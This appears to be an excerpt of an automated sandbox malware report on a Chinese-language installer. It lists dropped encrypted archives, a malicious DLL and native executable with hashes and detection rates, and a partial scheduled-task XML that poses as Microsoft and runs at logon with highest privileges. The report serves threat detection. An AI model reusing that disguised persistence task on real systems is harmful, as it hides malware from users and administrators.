                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.999905915279869
                          Encrypted:true
                          SSDEEP:49152:orHW6CwzpxNH6btQf7ikPICTKJ6VYFQ08xten:oa6DlwKIiqS09n
                          MD5:8CE0A5AEBCE8B28B7AFFE857C765A0DE
                          SHA1:2B86C493D7B193E11C1A01658442BBBDE2F50261
                          SHA-256:29A7E30E2DD018E06E1CD64787C5375B62C515B4B716C99D716030242E4499C8
                          SHA-512:9870EF6582F0C1E5803CB87E1C3A3B5579A5F5000CC8C64E40043C21F42D8200B99EE32158DB76620559C8E524FAE9B14AB448F6BFD93069FA0333B674D6489D
                          Malicious:false
                          Preview:.@S........<...............l.2...A.P....}..Zz<87Fq.....x......Z=.r...g...s.....0...~7}...x.0....).F....vw.Mo1.H...3N}.n...^.G.7.t.|c.@^...M....y<v{tn.=........C.w..;f......i<.......D..=]2Gg.e.P...|m..sO.[..2X.....0.D.<..5o.w..._.j..d.B...........P.g..!iu>tM...r..i..P4E.9qQ...3..=.....L&.G.Z.U*.......B#.].t....[.......t...nIS..;.....{.N9... |..Jr:...l.....Mv..4"A+.0..j.H.0...m'j.[Oy..'J......y.."...Znk$d@H~..........t.Nme.V..{P...aq.'@l.A..3,..ty<.B..Y.............A.Kc.....W[.#.....Fl.O.....6q...n..XC....Kw.aB.t..>...Ng..q.n..h{./p...........Y+...E.....u.4..F..su..sP.d..Y*..O?$..{m..)z<h.},A.>..j0.*B....>.L\f.19.d*k....l..x..++.G.m....v.A...'~uJ..W..!.]%.@.^@.:\J|......6.....2....L.-.....Z..BZ...e..1....I..e.....<P.v...^.e...37.O.,.....TkX.$... ((.[..5..)..V..+^.V.B[.c....I..9.[..ug.T...e.f.k....{hn..5...>....a@k|i?S.)8?:.U-.....s$....!...o.k..P....r.D..I_?.....R...N8tG..........AS......~....,...e....-c.(4.$..=.....~.=9..G^B._..hX<.
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          • Antivirus: Virustotal, Detection: 38%, Browse
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.999905915279869
                          Encrypted:true
                          SSDEEP:49152:orHW6CwzpxNH6btQf7ikPICTKJ6VYFQ08xten:oa6DlwKIiqS09n
                          MD5:8CE0A5AEBCE8B28B7AFFE857C765A0DE
                          SHA1:2B86C493D7B193E11C1A01658442BBBDE2F50261
                          SHA-256:29A7E30E2DD018E06E1CD64787C5375B62C515B4B716C99D716030242E4499C8
                          SHA-512:9870EF6582F0C1E5803CB87E1C3A3B5579A5F5000CC8C64E40043C21F42D8200B99EE32158DB76620559C8E524FAE9B14AB448F6BFD93069FA0333B674D6489D
                          Malicious:false
                          Preview:.@S........<...............l.2...A.P....}..Zz<87Fq.....x......Z=.r...g...s.....0...~7}...x.0....).F....vw.Mo1.H...3N}.n...^.G.7.t.|c.@^...M....y<v{tn.=........C.w..;f......i<.......D..=]2Gg.e.P...|m..sO.[..2X.....0.D.<..5o.w..._.j..d.B...........P.g..!iu>tM...r..i..P4E.9qQ...3..=.....L&.G.Z.U*.......B#.].t....[.......t...nIS..;.....{.N9... |..Jr:...l.....Mv..4"A+.0..j.H.0...m'j.[Oy..'J......y.."...Znk$d@H~..........t.Nme.V..{P...aq.'@l.A..3,..ty<.B..Y.............A.Kc.....W[.#.....Fl.O.....6q...n..XC....Kw.aB.t..>...Ng..q.n..h{./p...........Y+...E.....u.4..F..su..sP.d..Y*..O?$..{m..)z<h.},A.>..j0.*B....>.L\f.19.d*k....l..x..++.G.m....v.A...'~uJ..W..!.]%.@.^@.:\J|......6.....2....L.-.....Z..BZ...e..1....I..e.....<P.v...^.e...37.O.,.....TkX.$... ((.[..5..)..V..+^.V.B[.c....I..9.[..ug.T...e.f.k....{hn..5...>....a@k|i?S.)8?:.U-.....s$....!...o.k..P....r.D..I_?.....R...N8tG..........AS......~....,...e....-c.(4.$..=.....~.=9..G^B._..hX<.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.99693799156576
                          Encrypted:true
                          SSDEEP:768:jp8Uun5ODLwTs3N2Ziut+FUo4rToRydro6ahFubgvbarPtoE3DFJ3NjEdQmO64Rn:jp+noU6+fgRyGv6bwSPtoC9AdpkBSmVj
                          MD5:5E5B62F2674EFB7699D6E5680CBD498B
                          SHA1:4076C3374476B23CA83211C11E5125C963BD6DBC
                          SHA-256:C984B28BCD1D2FC0A5A40A5533BA2D685697C72208134A3A1A3772EB034CD5D5
                          SHA-512:9264CAC9EC3BCA68B9CB6960B055CC89282BF9EFA8BB032BA6AC5941690ABC63B80E0436325DDED4803F1E0FD2E246F7465F0085A6A945E95FADE9170824AB46
                          Malicious:false
                          Preview:.@S.....*.5l ................O.7..`a.we..&W..A.ZN...w...(.....@..4....~.....bE|.f.-.?.v7M..a(."g4I.d\.......W..W.OT.9.........$.e..0ijM:e..H-...w.K.CGd..Zm[...S..>...]...X.3.[...f..S..-g.vU9||I..U.Z|..Q.%3k.k7v(...._.z.5....m....Xn$>Y.Wh.z...[.O........[.C.....|9._.R.o..%.w-......p....a<v......)Sa.{$.mf._l..7W.\...*}.)....3....M......[.c<.m..x.:IK........I..r.\}.%~.V......(.V...|I.E.j+x9..u....6...3N.~...8..U.g..j.z...;..X.#...^.MHQ...y.LF...{....?.q...q...D_.a83.K.`._o.QIT1.#.1.....s7e..~...sz.{.P...{.../........2(.+.......b..D.9.[....0...>n.ML!.8.Z~........u...v..[..x......../6.x$...:.r.$.........>..#............tKF\. .O..'[V.U....U.18.I#^.vRO.2...`..Nu.34@X..&.Z..D.g.....%.d...U.....@3.._9z.*>dU.....31...|;{.u.q....p.cAh..Fu_....3*.?K&[Na...9~F....tL...>8.!DG..3/..2j...s.E.".....{|...b.:f..._9.i.n......b.W......h.V.m.R..o.3o5..../.......kD...S.i;.%O.w%..,rL.c.B.......n.....3.9.?..B.|9.4{.....3...!:u.`...5..by!..M..GL.......
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996937991565762
                          Encrypted:true
                          SSDEEP:1536:rpxCASR3U5V8s7XMYaoLCbuSUhxWVC8TH:dc3U5VLfLCbuSYxWVC+H
                          MD5:96191728F46632D577121843D546310C
                          SHA1:2A7EE9EDDCDAF195E2ED8D9C8A43DE7AC675A231
                          SHA-256:A077F09EB4DAEAB2982BD031083F51544D809B84ABDB1C97D78DE3DC76410032
                          SHA-512:70EC48BE8804BEDCD2F9221D51E08430CDD84A59662229AB08EF6A45EC328F618D25E883269ABD6E49A9A31AA990918501CE50E9C351766FB4DD6FF7B6508089
                          Malicious:false
                          Preview:7z..'...i..........2.......0...DD..n...^."$w.D..bM.W...UX.D..e..e}.d..o{SB...N.5....lB.._.H..X..a...v.Y,.*o*.,6....eo~(IK3.kG.T.......c....Z.W......3...7.H.9...>..n9...D..B]...#.Fz."6.a........Z..rk.\...[R...R.?..).#.//..{Y.....'....[m-.....@.....*R.5...x......^..x4.b...,|s)i.%.LZ.n....8.Y&<....q.....s....Rd....-..(..B..+...+.v.e..\.$h......n..r.|P.|..V..r...\.%-.7l.1...]....s...p..>....Np..3I.b8'_.k .4.X..4.Q..T.........X.l..n9Sm.+.t....UJy..]*...m...b.]..........k...:.'y)Ay..-.k.a^r...."..$4.he'..U!T.&.>p...m..`.1_v.,F.P../.{...Q4..!......k.B...L.p..Z.6..En...H.9.Pn.U.KQxi..p..MnT....L.{(..s.;.Mr...1.]O.)N.1ns.....&.......i...*X.K..,..b...(...".d~..A....=.C.WG..`.y.......1_.(PDl.X...P..-...:6./!..~.....w.9r...@&.9...U....#..M7.......|....7S.U m..;=].....o.......q...0W.`1......9Q%....y.)......?J.....d..w:).H$...K..r.C.au....\IA..<.iSr]...k^..q..P........E.F.w]h?.Om....!+..........O....e.JfR.Pm....a~^..)...n...L...+jd.%..e
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.99990591527987
                          Encrypted:true
                          SSDEEP:49152:5Mo17OIO8i/NM7F39GTSBWKeQifmq9EV19:io17O8i/+7B9ScF1q9019
                          MD5:CB8B923780CA9DCAB3C2D8A9A6C79544
                          SHA1:4E0A293B329E8A4A2898782065A2DA4882DC22D9
                          SHA-256:666C2E43D2841673A0CC05B94DDE575C4398BEA21805A5DDDF2A2777A3517CCF
                          SHA-512:A1C1DB233E8C3724DE52429C43D8A33E5BB9878D0170F2965DAA4AC2825755BF4AB170B3A6340A8E98867C46001D4861A3F055F219F4E081D9C92C0431458C51
                          Malicious:false
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          • Antivirus: Virustotal, Detection: 6%, Browse
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3443983145211007
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                          MD5:1E67E91688292692932CD9096EDEA2BD
                          SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                          SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                          SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1672472
                          Entropy (8bit):7.999884409585901
                          Encrypted:true
                          SSDEEP:24576:t+DyQWCAIHJxhRLxs1IF2D2PWbUuSLAQCxOBNlnua+1iPcxgE+63xOUuCtuR:oZWdi1s1IF8BUnLCYBNlV+1xkmOU4
                          MD5:C3FFBA57909DE6ACDC3EA1EE393C9961
                          SHA1:B0FBA32B27E62CADD088C05645355DD5F11E323A
                          SHA-256:80EBA8624265A018E2C61497F32A20E6F5F13E37361E6214523096B9E47D2034
                          SHA-512:E3A4512C0B16B14682472C45DA2102142C26DE228BBFFFD9B5F22F41048CA4CE2830CBF575A00934A961CBF1ED76E6DD1129480F41920D13DC6B914BF45BA57E
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:NlllulpgztZ:NllUO
                          MD5:ADB67D140C904AFBF0D2C47FCFC73086
                          SHA1:CAA1973FC7AB5367DC2007487049041C6D0AC54E
                          SHA-256:BA09CC360CD10629A32D8E84392BAD452284123893B0792F6417340A72E3B951
                          SHA-512:85BE6449222EAA096A6F84E051D16DB1147498DA621BDB6C7B5D11CF6C306DB4DE90CEB457EDE22CCA53BC94CF4D1E6D0FAE203D196AF7AF225AF87464E1286E
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
